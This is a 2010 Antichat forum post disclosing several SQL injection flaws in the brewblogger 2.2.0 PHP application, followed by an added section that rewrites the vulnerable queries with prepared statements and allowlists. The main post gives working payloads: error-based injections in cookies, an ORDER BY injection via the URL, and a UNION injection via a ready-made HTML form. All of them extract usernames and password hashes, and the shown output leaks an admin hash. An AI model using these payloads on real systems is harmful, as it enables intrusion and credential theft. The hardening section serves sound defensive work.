Antichat is available again.
The Antichat forum is back and open to users once more.
Security, programming, technology and much more are discussed here.
The community is gathering together again.
New address: forum.antichat.xyz

21.04.2010, 02:44
brewblogger 2.2.0
Blind SQL inj
index.php
PHP code:
require_once ('Connections/config.php');
require ('includes/authentication_nav.inc.php'); session_start();
include ('includes/db_connect_universal.inc.php');...
/includes/authentication_nav.inc.php
PHP code:
mysql_select_db($database_brewing, $brewing);
$query_user = sprintf("SELECT * FROM users WHERE user_name = '%s'", $loginUsername);
$user = mysql_query($query_user, $brewing) or die(mysql_error());
$row_user = mysql_fetch_assoc($user);
$totalRows_user = mysql_num_rows($user);...
/includes/db_connect_universal.inc.php
PHP code:
// Get server's PHP version
$phpVersion = phpversion();
//echo $phpVersion;
$currentPage = "http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
if (!empty($_SERVER["QUERY_STRING"])) $currentPage .= "?".$_SERVER['QUERY_STRING'];
$loginUsername = $_SESSION["loginUsername"];
target: index.php
Condition:
rg=on;
mg=off.
Again, in the cookie, for example, we put:
; loginUsername=h' and (select 1 from (select count(0),concat(version(),floor(rand(0)*2)) from (select 1 union select 2 union select 3)x group by 2)a)#
Logins and passwords are in the users table:
user_name password
Working query (tested on 5.1.40-community):
; loginUsername=h' and (select 1 from (select count(0),concat_ws(0x3a,(select user_name from users limit 0,1),(select password from users limit 0,1),floor(rand(0)*2)) from (select 1 union select 2 union select 3)x group by 2)a)#
Blind SQL inj
/includes/db_connect_universal.inc.php
PHP code:
// User Info
mysql_select_db($database_brewing, $brewing);
$query_user5 = sprintf("SELECT * FROM users WHERE user_name = '%s'", $filter);
$user5 = mysql_query($query_user5, $brewing) or die(mysql_error());
$row_user5 = mysql_fetch_assoc($user5);
$totalRows_user5 = mysql_num_rows($user5);...
need:
rg=on;
mg=off
target:index.php
Result:
in the cookie, e.g.:
; filter=h' and (select 1 from (select count(0),concat_ws(0x3a,(select user_name from users limit 0,1),(select password from users limit 0,1),floor(rand(0)*2)) from (select 1 union select 2 union select 3)x group by 2)a)#
blind SQL inj (in ORDER BY)
includes/db_connect_universal.inc.php
PHP code:
...
if ($page == "brewBlogList") {
if ($filter == "all") {
mysql_select_db($database_brewing, $brewing);
$query_log = sprintf("SELECT * FROM brewing ORDER BY %s %s", $sort, $dir);
$log = mysql_query($query_log, $brewing) or die(mysql_error());
$row_log = mysql_fetch_assoc($log);
$totalRows_log = mysql_num_rows($log);
}...
PHP code:
...if ($page == "brewBlogList") $dir = "DESC";
else $dir = "ASC";
if (isset($_GET['dir'])) {
$dir = (get_magic_quotes_gpc()) ? $_GET['dir'] : addslashes($_GET['dir']);...
PHP code:
...$page = $row_pref['home'];
if (isset($_GET['page'])) {
$page = (get_magic_quotes_gpc()) ? $_GET['page'] : addslashes($_GET['page']);
}...
PHP code:
...elseif ($page == "brewBlogList") $sort = "brewDate";...
need only:
rg=on 
Result:
http://localhost/brewblogger2.2.0/index.php?page=brewBlogList&dir=[SQL]
http://localhost/brewblogger2.2.0/index.php?page=brewBlogList&dir=,%28select%201%20from%20%28select%20count%280%29,concat_ws%280x3a,%28select%20user_name%20from%20users%20limit%200,1%29,%28select%20password%20from%20users%20limit%200,1%29,floor%28rand%280%29*2%29%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%202%29a%29#
Duplicate entry 'admin:21232f297a57a5a743894a0e4a801fc3:1' for key 'group_key'
I worked it as a blind one; it looks like there are no printable ones (I think)!
Further down the text there are injections with rg=on!
SQL inj
HOORAY!
The search for a printable SQLi ended in success!
target: our_site/sections/entry.inc.php?action=hack
/sections/entry.inc.php
Here are the pieces:
PHP code:
...if ($action == "default") {
$style = "default";
if (isset($_GET['style'])) {
$style = (get_magic_quotes_gpc()) ? $_GET['style'] : addslashes($_GET['style']);
}
} else
$style = $_POST['style'];...
PHP code:
...mysql_select_db($database_brewing, $brewing);
$query_style1 = sprintf("SELECT * FROM styles WHERE brewStyle = '%s'", $style);
$style1 = mysql_query($query_style1, $brewing) or die(mysql_error());
$row_style1 = mysql_fetch_assoc($style1);
$totalRows_style1 = mysql_num_rows($style1);...
need:
mg=off
Result:
<form action="http://localhost/brewblogger2.2.0/sections/entry.inc.php?action=hack" method="post">
<input type="text" name="style" value="' union select 1,user_name,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from users-- ">
<input type=submit value="ok">
</form>
PS
I did not research it fully!
Last edited by Strilo4ka; 21.04.2010 at 03:09.
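The four query sites quoted in the post all share one defect: sprintf('%s') performs no escaping, identity comes from register_globals-exposed input, and ORDER BY identifiers are concatenated straight from the request. Below is an added example of how a maintainer would harden them (not brewblogger's code and not part of this post); it assumes a mysqli connection $brewing with mysqlnd available for get_result(), and uses the table and column names shown above (users.user_name, brewing, styles.brewStyle); the brewName column in the sort allowlist is a hypothetical placeholder.

```php
<?php
// Added example, not brewblogger's code. Assumes mysqli $brewing (mysqlnd) and
// the table/column names from the post. Report DB errors as exceptions so they
// are logged server-side instead of echoed to the client via die(mysql_error()).
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// 1) Identity: read only the server-side session (register_globals off), never
//    a same-named cookie or request variable.
session_start();
$loginUsername = isset($_SESSION['loginUsername']) ? (string) $_SESSION['loginUsername'] : '';

// 2) The user lookup (authentication_nav.inc.php / db_connect_universal.inc.php):
//    bind the value instead of formatting it into the SQL string.
function fetchUserByName(mysqli $db, string $userName): ?array
{
    $stmt = $db->prepare('SELECT * FROM users WHERE user_name = ?');
    $stmt->bind_param('s', $userName);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// 3) The brewBlogList ORDER BY: column names and ASC/DESC cannot be bound as
//    parameters, so map the request value onto a fixed allowlist and fall back
//    to a default for anything else. Neither identifier ever comes from the request.
function brewLogResult(mysqli $db, string $sort, string $dir): mysqli_result
{
    $allowedSort = ['brewDate' => 'brewDate', 'brewName' => 'brewName']; // brewName is hypothetical
    $allowedDir  = ['ASC' => 'ASC', 'DESC' => 'DESC'];
    $sortCol = $allowedSort[$sort] ?? 'brewDate';
    $dirKw   = $allowedDir[strtoupper($dir)] ?? 'DESC';
    return $db->query("SELECT * FROM brewing ORDER BY `$sortCol` $dirKw");
}

// 4) The style lookup (sections/entry.inc.php): the same rule whether the value
//    arrives via GET or POST, with no dependence on magic_quotes or addslashes().
function fetchStyle(mysqli $db, string $style): ?array
{
    $stmt = $db->prepare('SELECT * FROM styles WHERE brewStyle = ?');
    $stmt->bind_param('s', $style);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage at the original call sites, e.g.:
// $row_user  = fetchUserByName($brewing, $loginUsername);
// $log       = brewLogResult($brewing, $_GET['sort'] ?? '', $_GET['dir'] ?? '');
// $row_style = fetchStyle($brewing, $_POST['style'] ?? ($_GET['style'] ?? 'default'));
```

With prepared statements the "Duplicate entry ... for key 'group_key'" response the post relies on can no longer be produced by the user_name, filter or style values, and the allowlist closes the ORDER BY path regardless of register_globals.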